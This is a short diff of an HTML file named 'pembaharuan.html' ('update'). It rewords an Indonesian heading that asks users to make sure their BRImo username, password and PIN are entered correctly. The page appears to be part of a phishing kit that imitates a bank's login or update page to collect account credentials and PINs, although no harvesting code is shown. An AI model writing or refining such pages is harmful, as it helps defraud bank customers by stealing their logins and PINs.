--- a/pembaharuan.html
+++ b/pembaharuan.html
@@ -253,7 +253,7 @@
                 <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -10px auto;">
                 <center>
                 <div>
-                     <label for="nomor"><h3>Untuk login ke akun BRImo anda Pastikan Username/Password & PIN Masukan telah Benar.</h3></label><br><br>
+                     <label for="nomor"><h3>Untuk login ke akun BRImo anda Pastikan Username/Password & PIN yang anda Masukan telah Benar.</h3></label><br><br>
                     
          </div>
       <div class="row">
